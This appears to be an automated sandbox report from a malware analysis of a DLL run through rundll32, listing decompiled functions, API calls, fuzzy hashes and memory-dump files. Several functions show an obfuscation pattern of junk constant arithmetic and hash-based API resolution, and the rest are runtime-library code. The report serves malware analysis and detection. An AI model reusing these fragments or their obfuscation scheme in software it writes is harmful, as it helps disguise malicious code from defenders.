Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: 291628bf29a1733aeefe0036b6084d4be0373c307bf806f308028e93738353d8
Instruction ID: 5b79a9f3272a285f0bc727d2d6f4db5e8a7be798465fbb40fb281ab7da0c5106
Opcode Fuzzy Hash: 291628bf29a1733aeefe0036b6084d4be0373c307bf806f308028e93738353d8
Instruction Fuzzy Hash: A4C08CF22082016BF602EBB08C8880B238CEB08292311C808F000D7005EF39E4000A00

Uniqueness

Uniqueness Score: -1.00%

Function 10024B73 Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10024B73(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10048aa4 = _t6;
				if(_t6 != 0) {
					_t7 = E10024B18(__eflags);
					__eflags = _t7 - 3;
					 *0x1004a564 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E10024019(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10048aa4);
							 *0x10048aa4 =  *0x10048aa4 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,100207AC,00000001,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C), ref: 10024B84
HeapDestroy.KERNEL32(?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 10024BBA

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: a1744ea04a4e4aac06c1af9c57638635ef45047b2ea6b21dfa4896526f954c19
Instruction ID: 7ecfd6e5781d3b6a0fc92bf663133c7527b62661b4374eaf376562758425141b
Opcode Fuzzy Hash: a1744ea04a4e4aac06c1af9c57638635ef45047b2ea6b21dfa4896526f954c19
Instruction Fuzzy Hash: 26E02230A123129EF786CB30AF8671A33F4EB06382F424836F004C98A0FFB0C140DA05

Uniqueness

Uniqueness Score: -1.00%

Function 0486602C Relevance: 1.6, APIs: 1, Instructions: 66
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E0486602C(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, long _a20, WCHAR* _a24, intOrPtr _a28, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t42;
				void* _t50;
				signed int _t53;
				long _t57;
				long _t58;

				_t58 = __edx;
				_push(0);
				_push(_a36);
				_t57 = __ecx;
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E048632C4(_t42);
				_v32 = 0xf2bcc;
				_v28 = 0x9963f;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0x481e97;
				_v12 = _v12 + 0x3bb9;
				_v12 = _v12 | 0xe5ca697e;
				_v12 = _v12 ^ 0xe5cf84b6;
				_v8 = 0xca7b5c;
				_t53 = 0x38;
				_v8 = _v8 / _t53;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x0004807b;
				_v16 = 0xf3cd85;
				_v16 = _v16 ^ 0x0b7576d7;
				_v16 = _v16 ^ 0x0b87a2f8;
				E048552F2(_t53, _v8 % _t53, _t53, 0xf4, 0xbdcc8d36, 0x9f49d153);
				_t50 = CreateFileW(_a24, _a20, _a12, 0, _t57, _t58, 0); // executed
				return _t50;
			}

0x04866037
0x04866039
0x0486603a
0x0486603d
0x0486603f
0x04866040
0x04866043
0x04866046
0x04866049
0x0486604c
0x0486604f
0x04866052
0x04866055
0x04866056
0x04866057
0x0486605c
0x04866066
0x0486606f
0x04866072
0x04866075
0x0486607c
0x04866083
0x0486608a
0x04866091
0x0486609d
0x048660a5
0x048660a8
0x048660ac
0x048660b3
0x048660ba
0x048660c1
0x048660dc
0x048660f1
0x048660f9

APIs

CreateFileW.KERNEL32(000F2BCC,0009963F,911404DD,00000000,?,00000000,00000000), ref: 048660F1

Memory Dump Source

Source File: 00000003.00000002.256529300.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true

Associated: 00000003.00000002.256523961.0000000004850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.256563677.0000000004872000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6d1239d744402909eaf6f0c2dda43dfc09e7586af067e989eca2d59162b3ddb8
Instruction ID: fe8a66c5d355b96932f8ef8caaa7b6f00dea950000bc1f12cb3313327497aa88
Opcode Fuzzy Hash: 6d1239d744402909eaf6f0c2dda43dfc09e7586af067e989eca2d59162b3ddb8
Instruction Fuzzy Hash: E221257290020DBFDF05DFD5DC858AFBFB9EB44358F108498FA14A2220D7B64A64AB90

Uniqueness

Uniqueness Score: -1.00%

Function 04858B6C Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04858B6C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t29;
				int _t35;
				void* _t38;

				_push(_a8);
				_t38 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E048632C4(_t29);
				_v20 = 0x5d7bf;
				_v16 = 0x99716;
				_v16 = 0xe29eb1;
				_v16 = _v16 ^ 0x3393c2ed;
				_v16 = _v16 ^ 0x337b9675;
				_v8 = 0xbc32bf;
				_v8 = _v8 + 0xffff25e6;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0xde5dd6d8;
				_v8 = _v8 ^ 0xde59c7e5;
				_v12 = 0xe3d251;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0x08a6b2c4;
				_v12 = _v12 ^ 0x08adb9ba;
				E048552F2(__ecx, __edx, __ecx, 0x34, 0x2b7f8c29, 0x9f49d153);
				_t35 = FindCloseChangeNotification(_t38); // executed
				return _t35;
			}

0x04858b73
0x04858b76
0x04858b78
0x04858b7b
0x04858b7c
0x04858b7d
0x04858b82
0x04858b8c
0x04858b93
0x04858b9a
0x04858ba1
0x04858ba8
0x04858baf
0x04858bb6
0x04858bba
0x04858bc1
0x04858bc8
0x04858bcf
0x04858bd3
0x04858bda
0x04858bf7
0x04858c00
0x04858c06

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 04858C00

Memory Dump Source

Source File: 00000003.00000002.256529300.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true

Associated: 00000003.00000002.256523961.0000000004850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.256563677.0000000004872000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: d6461675db5e5e1fdae447af73487a38bc4d14b904fac464a7ebfd6aadb21cc1
Instruction ID: b068f6314bc927b672c68a5021e060c40b7c5ffb57a9261c148ceb35761bf6e9
Opcode Fuzzy Hash: d6461675db5e5e1fdae447af73487a38bc4d14b904fac464a7ebfd6aadb21cc1
Instruction Fuzzy Hash: CF015371C0520CFBDB54EFE8890A88EBBB4EF00318F108589E825BB254E3B59B14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 048708C3 Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E048708C3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t32;
				void* _t33;

				_v20 = 0xba35d;
				_v16 = 0x2c63f;
				_v8 = 0x18668b;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x77;
				_v8 = _v8 + 0xffff88d8;
				_v8 = _v8 ^ 0xabd92865;
				_v12 = 0xa923ab;
				_v12 = _v12 + 0xffffe870;
				_v12 = _v12 ^ 0x2e66d6cd;
				_v12 = _v12 ^ 0x2eca4b61;
				_v16 = 0xa7f2df;
				_v16 = _v16 + 0xffff74c1;
				_v16 = _v16 ^ 0x00a03459;
				E048552F2(_t32, _t33, _t32, 0xc1, 0x82522eb8, 0x9f49d153);
				ExitProcess(0);
			}

0x048708c9
0x048708d0
0x048708d7
0x048708de
0x048708f6
0x048708f9
0x04870900
0x04870907
0x0487090e
0x04870915
0x0487091c
0x04870923
0x0487092a
0x04870931
0x04870941
0x0487094b

APIs

ExitProcess.KERNEL32(00000000), ref: 0487094B

Memory Dump Source

Source File: 00000003.00000002.256529300.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true

Associated: 00000003.00000002.256523961.0000000004850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.256563677.0000000004872000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 1d89245fcaf8bc8bfc49024291ef06cfa865d6d529eb9dfc713b0c2537c2a249
Instruction ID: a3ff947f4560829c55f0cf5e8dd4239a80bbad8359d903aa00398d3f21bcf1c5
Opcode Fuzzy Hash: 1d89245fcaf8bc8bfc49024291ef06cfa865d6d529eb9dfc713b0c2537c2a249
Instruction Fuzzy Hash: 0C0100B1D4130CFBDB44DFE9E98A98DBBB0EB10714F2081899824B72A0D3B81B549F44

Uniqueness

Uniqueness Score: -1.00%

Function 100036FA Relevance: 1.5, APIs: 1, Instructions: 28
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E100036FA(void* __ebx, void* __esi, void* __eflags) {
				void* _t2;
				signed int _t7;
				char _t9;
				signed int _t12;
				void* _t14;
				void* _t15;
				signed int _t17;

				_t2 = E1001F631(__ebx, _t14, _t15, __esi,  *0x100440e4);
				if(_t2 != 0) {
					_t12 =  *0x100440e4; // 0x0
					_push(__ebx);
					_t9 = 0;
					__eflags = _t12;
					_push(__esi);
					_t17 = _t12;
					if(__eflags > 0) {
						do {
							 *((char*)(_t9 + _t2)) = _t9;
							_t9 = _t9 + 1;
							__eflags = _t9 -  *0x100440e4; // 0x0
						} while (__eflags < 0);
					}
					_push(_t2); // executed
					E1001F6F4(_t9, _t15, _t17, __eflags); // executed
					asm("sbb eax, eax");
					_t7 =  ~(_t9 - _t17) & 0x00000003;
					__eflags = _t7;
					return _t7;
				} else {
					return _t2;
				}
			}

APIs

_malloc.LIBCMT ref: 10003700

Part of subcall function 1001F631: __FF_MSGBANNER.LIBCMT ref: 1001F654
Part of subcall function 1001F631: __NMSG_WRITE.LIBCMT ref: 1001F65B
Part of subcall function 1001F631: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1002692B,?,00000001,00000001,10023F72,00000018,100413C8,0000000C,10024001,00000001), ref: 1001F6A9

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 2f76cf260a46a9d53b32d34cea165e875efa5fab80f71dccc9ba808c39acbc3c
Instruction ID: adc5ccbd96ec724cefc73a2f5283e4f6b1af06d455631b59cbb6fed6ff4e13e7
Opcode Fuzzy Hash: 2f76cf260a46a9d53b32d34cea165e875efa5fab80f71dccc9ba808c39acbc3c
Instruction Fuzzy Hash: 53E086BA2141A24AFF19DAF89EE68562748D7110913228A7EE646C6556DA20E8208250

Uniqueness

Uniqueness Score: -1.00%

Function 10020E42 Relevance: 1.5, APIs: 1, Instructions: 6
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E10020E42() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E10020D63(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}

0x10020e42
0x10020e44
0x10020e46
0x10020e48
0x10020e50

APIs

_doexit.LIBCMT ref: 10020E48

Part of subcall function 10020D63: __lock.LIBCMT ref: 10020D71
Part of subcall function 10020D63: __decode_pointer.LIBCMT ref: 10020DA0
Part of subcall function 10020D63: __decode_pointer.LIBCMT ref: 10020DAD

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: __decode_pointer$__lock_doexit
String ID:
API String ID: 3276244213-0
Opcode ID: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
Instruction ID: ebb22d002e4bc0be4ce9b3835a93604f57b833b8c7c0406f906832a81f765660
Opcode Fuzzy Hash: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
Instruction Fuzzy Hash: 0CA00279BD530062F871D1903CD3F5421065750F01FD40051BB182C1C2A5C732584057

Uniqueness

Uniqueness Score: -1.00%

Function 1000302D Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000302D(void* _a4, long _a8, long _a12, long _a16) {
				void* _t5;

				_t5 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t5;
			}

0x1000303d
0x10003043

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 1000303D

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1fbba5c948703a5d5ab931949a929f4f09bd1ed6a173005a8193a93e686e7ec2
Instruction ID: 5d0982da9e6573c30bbcbca7a50cfe3a5b7972743b959b5c0e66da410622836f
Opcode Fuzzy Hash: 1fbba5c948703a5d5ab931949a929f4f09bd1ed6a173005a8193a93e686e7ec2
Instruction Fuzzy Hash: 1CB00832418792EBDF02DF90CD4482ABAA2BB89301F184C5CF6A151570D7228468EF07

Uniqueness

Uniqueness Score: -1.00%

Function 10003044 Relevance: 1.3, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003044(void* _a4, long _a8, long _a12) {
				int _t4;

				_t4 = VirtualFree(_a4, _a8, _a12); // executed
				return _t4;
			}

0x10003050
0x10003056

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 10003050

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: df584dda371157191712c15505aae26ff14b4c57a0491ab4d9c6d3331c076541
Instruction ID: 115bf12ed0fa7589b407f79f41f639b3f7b4823b02c2866c4b7f4f1f1b5172d7
Opcode Fuzzy Hash: df584dda371157191712c15505aae26ff14b4c57a0491ab4d9c6d3331c076541
Instruction Fuzzy Hash: 43B00235408610FFDF025F50DD4480ABBA2BB89321F10D958F1AA51430D7329420EF07

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10011C86 Relevance: 12.1, APIs: 8, Instructions: 129
filestringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E10011C86(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t38;
				long _t49;
				CHAR* _t50;
				CHAR* _t56;
				CHAR* _t59;
				void* _t61;
				int _t65;
				CHAR* _t74;
				void* _t75;
				void* _t76;
				void* _t89;
				void* _t90;
				CHAR* _t92;
				void* _t93;
				void* _t96;
				struct _WIN32_FIND_DATAA* _t98;
				void* _t100;
				CHAR* _t106;

				_t94 = __esi;
				_t90 = __edx;
				_t76 = __ecx;
				_t98 = _t100 - 0x13c;
				_t38 =  *0x10045580; // 0x2ef01728
				 *(_t98 + 0x140) = _t38 ^ _t98;
				_push(0x14);
				E1001FBC4(E10033C93, __ebx, __edi, __esi);
				_t92 =  *(_t98 + 0x14c);
				_t74 =  *(_t98 + 0x150);
				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
				_t106 = _t92;
				_t107 = _t106 == 0;
				if(_t106 == 0) {
					L1:
					E10004E6E(_t74, _t76, _t92, _t94, _t107);
				}
				if((0 | _t74 != 0x00000000) == 0) {
					goto L1;
				}
				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
				if(_t49 != 0) {
					__eflags = _t49 - 0x104;
					if(_t49 >= 0x104) {
						goto L5;
					} else {
						E1000424F(_t98 - 0x10, E1001044F());
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						E10011ABC(_t74, _t98, __eflags, _t92, _t98 - 0x10);
						_t56 = PathIsUNCA( *(_t98 - 0x10));
						__eflags = _t56;
						if(_t56 != 0) {
							L19:
							E10001260( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
							_t50 = 1;
							__eflags = 1;
						} else {
							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags =  *(_t98 - 0x1c) & 0x00000002;
								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
									CharUpperA(_t92);
								}
								__eflags =  *(_t98 - 0x1c) & 0x00000004;
								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
									goto L19;
								} else {
									_t61 = FindFirstFileA(_t74, _t98);
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										goto L19;
									} else {
										FindClose(_t61);
										__eflags =  *(_t98 - 0x14);
										if( *(_t98 - 0x14) == 0) {
											goto L10;
										} else {
											__eflags =  *(_t98 - 0x14) - _t92;
											if( *(_t98 - 0x14) <= _t92) {
												goto L10;
											} else {
												_t65 = lstrlenA( &(_t98->cFileName));
												_t89 =  *(_t98 - 0x14) - _t92;
												__eflags = _t65 + _t89 - 0x104;
												if(_t65 + _t89 >= 0x104) {
													goto L10;
												} else {
													_t97 = 0x104 - _t89;
													__eflags = 0x104 - _t89;
													E10005C93(_t74, _t90, _t92, 0x104 - _t89, _t98,  *(_t98 - 0x14), _t97,  &(_t98->cFileName));
													goto L19;
												}
											}
										}
									}
								}
							} else {
								_push(_t74);
								E10011C5B( *((intOrPtr*)(_t98 - 0x18)));
								L10:
								E10001260( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
								goto L5;
							}
						}
					}
				} else {
					E10004EB7(_t74, _t76, _t92, 0x104, _t98, _t92, 0x104, _t74, 0xffffffff);
					_push(_t74);
					E10011C5B( *((intOrPtr*)(_t98 - 0x18)));
					L5:
					_t50 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
				_pop(_t93);
				_pop(_t96);
				_pop(_t75);
				return E1001FBB5(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
			}

APIs

__EH_prolog3.LIBCMT ref: 10011CA5
GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 10011CE6

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

PathIsUNCA.SHLWAPI(?,00000000), ref: 10011D30
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 10011D4E
CharUpperA.USER32(?), ref: 10011D75
FindFirstFileA.KERNEL32(?,00000000), ref: 10011D86
FindClose.KERNEL32(00000000), ref: 10011D92
lstrlenA.KERNEL32(?), ref: 10011DA7

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FindH_prolog3Path$CharCloseException@8FileFirstFullInformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 4099955704-0
Opcode ID: 34f6f2e06f6c52f7f72971c1c83acd915632a22f9182f0fa51328fb5f4cbc38c
Instruction ID: 71c2b450ac2c88f27229685b2eaf748cff0cdd07423a00f921b144b935e16ce8
Opcode Fuzzy Hash: 34f6f2e06f6c52f7f72971c1c83acd915632a22f9182f0fa51328fb5f4cbc38c
Instruction Fuzzy Hash: E841CD71A0014AAFEB15DBB4CC89AFF77BCEF44355F010529F915EA192EB30E984CA60

Uniqueness

Uniqueness Score: -1.00%

Function 100037A6 Relevance: 9.1, APIs: 6, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E100037A6(void* __ecx, void* __edx) {
				signed int _v8;
				int _v88;
				char _v92;
				struct tagRECT _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t16;
				int _t18;
				void* _t19;
				int _t23;
				int _t24;
				void* _t40;
				void* _t48;
				void* _t49;
				void* _t52;
				signed int _t53;

				_t48 = __edx;
				_t16 =  *0x10045580; // 0x2ef01728
				_v8 = _t16 ^ _t53;
				_t52 = __ecx;
				_t18 = IsIconic( *(__ecx + 0x20));
				_t54 = _t18;
				if(_t18 == 0) {
					_t19 = E10007997(_t40, _t52, _t49, _t52, __eflags);
				} else {
					_push(_t40);
					E1001017C(_t40,  &_v92, _t49, _t52, _t54);
					SendMessageA( *(_t52 + 0x20), 0x27, _v88, 0);
					_t23 = GetSystemMetrics(0xb);
					_t24 = GetSystemMetrics(0xc);
					GetClientRect( *(_t52 + 0x20),  &_v108);
					asm("cdq");
					asm("cdq");
					DrawIcon(_v88, _v108.right - _v108.left - _t23 + 1 - _t48 >> 1, _v108.bottom - _v108.top - _t24 + 1 - _t48 >> 1,  *(_t52 + 0x11c));
					_t19 = E100101D0(_t23,  &_v92, _t24, _t52, _t54);
					_t49 = _t52;
					_t40 = _t49;
				}
				return E1001FBB5(_t19, _t40, _v8 ^ _t53, _t48, _t49, _t52);
			}

APIs

IsIconic.USER32 ref: 100037BC

Part of subcall function 1001017C: __EH_prolog3.LIBCMT ref: 10010183
Part of subcall function 1001017C: BeginPaint.USER32(?,?,00000004,100079AE,?,00000058,10003840), ref: 100101AF

SendMessageA.USER32 ref: 100037DB
GetSystemMetrics.USER32 ref: 100037E9
GetSystemMetrics.USER32 ref: 100037EF
GetClientRect.USER32 ref: 100037FA
